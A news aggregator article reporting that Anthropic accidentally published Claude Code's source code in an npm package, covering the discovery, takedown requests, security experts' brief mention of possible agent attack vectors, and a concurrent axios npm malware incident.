50/FIFTY

Today's stories, rewritten neutrally

AIApr 2

Anthropic Source Code Leak Exposes AI Coding Agent Architecture to Competitors

Anthropic accidentally released 512,000 lines of Claude Code source code in an npm package, revealing security vulnerabilities and internal architecture details.

Synthesized from 7 sources

Anthropic accidentally exposed the complete source code of its Claude Code AI coding agent on March 31 when a 59.8 MB source map file was included in version 2.1.88 of its npm package. The leak revealed 512,000 lines of unobfuscated TypeScript across 1,906 files, including the complete permission model, security validators, and references to unreleased features.

Security researcher Chaofan Shou discovered the exposure around 4:23 UTC, and mirror repositories quickly spread across GitHub before Anthropic could contain the leak. The company confirmed the exposure resulted from a packaging error caused by human error, stating that no customer data or model weights were involved. Anthropic initially filed copyright takedown requests that resulted in the removal of more than 8,000 copies from GitHub, though the company later said the broad takedown was unintended and retracted most notices.

The leaked codebase reveals the technical architecture that enables Claude Code to use tools, manage files, execute bash commands, and orchestrate multi-agent workflows. Security experts identified potential attack vectors, including context poisoning through configuration files and sandbox bypass techniques that exploit parsing differentials in the bash command validation system. The source code shows Claude Code uses a 46,000-line query engine with three-layer compression and 2,500 lines of bash security validation running 23 sequential checks on shell commands.

The timing coincided with malicious versions of the axios npm package containing malware being published to the same registry. Teams that installed or updated Claude Code between 00:21 and 03:29 UTC on March 31 may have inadvertently downloaded both the exposed source code and unrelated malware. This marked the second security incident for Anthropic within five days, following a separate configuration error that exposed nearly 3,000 internal assets.

According to Anthropic's public disclosures, approximately 90% of Claude Code's source code was AI-generated, which may affect its intellectual property protection under current U.S. copyright law requiring human authorship. Security experts recommend that enterprises audit configuration files in cloned repositories, treat external servers as untrusted dependencies, and implement commit provenance verification for AI-assisted code development.

Sources (7)

Bias Scale:
LeftCenterRight

Comments

No comments yet. Be the first!